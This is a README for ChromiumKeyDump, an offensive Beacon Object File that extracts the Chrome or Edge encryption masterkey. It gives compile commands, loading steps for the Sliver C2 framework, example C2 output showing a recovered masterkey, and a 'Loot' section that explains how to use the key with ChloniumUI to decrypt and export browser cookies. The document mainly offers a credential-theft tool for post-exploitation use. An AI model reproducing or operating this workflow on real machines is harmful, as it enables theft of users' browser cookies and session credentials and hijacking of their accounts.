ChromiumKeyDump

BOF implementation of Chlonium tool to dump Chrome/Edge Masterkey.

Forked from https://github.com/crypt0p3g/bof-collection

Setup

How to compile

  • Visual Studio:

x86:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars32.bat"
cl.exe /c /GS- /TP ChromiumKeyDump.cpp /FoChromiumKeyDump.x86.o

x64:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
cl.exe /c /GS- /TP ChromiumKeyDump.cpp /FoChromiumKeyDump.x64.o
  • MinGW:

x86: i686-w64-mingw32-gcc -c .\ChromiumKeyDump.cpp -o .\ChromiumKeyDump.x86.o
x64: x86_64-w64-mingw32-gcc.exe -c .\ChromiumKeyDump.cpp -o .\ChromiumKeyDump.x64.o

How to load

After compiling, place the object files (.o) into a folder with the extension file (extension.json):

# folder structure
$ find ./chromiumkeydump
chromiumkeydump
chromiumkeydump/ChromiumKeyDump.x64.o
chromiumkeydump/ChromiumKeyDump.x86.o
chromiumkeydump/extension.json

Load the extension into Sliver:

extensions load /opt/chromiumkeydump

Usage

chromiumkeydump [0=chrome, 1=edge]

Example

[server] sliver (DIFFICULT_SOFA) > chromiumkeydump 0

[*] Successfully executed chromiumkeydump (coff-loader)
[*] Got output:
[ChromiumKeyDump] Target File: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Local State
[ChromiumKeyDump] Found EncryptedKey at position: 718
[ChromiumKeyDump] EncryptedKey total length: 356
[ChromiumKeyDump] Masterkey: aGFhYWFhYWFhYWFhYWFhYWFheW91d2lzaHlvdXdpc2gK

Loot

The browser’s User Data directory are located at:

# chrome
c:\Users\$username\AppData\Local\Google\Chrome\User Data\

# edge
c:\Users\$username\AppData\Local\Microsoft\Edge\User Data\

To decrypt cookies, for example build and run ChloniumUI. Enter the MasterKey recovered from the BOF, the location of User Data\Default\Network\Cookies, and export.

References:

GitHub

View Github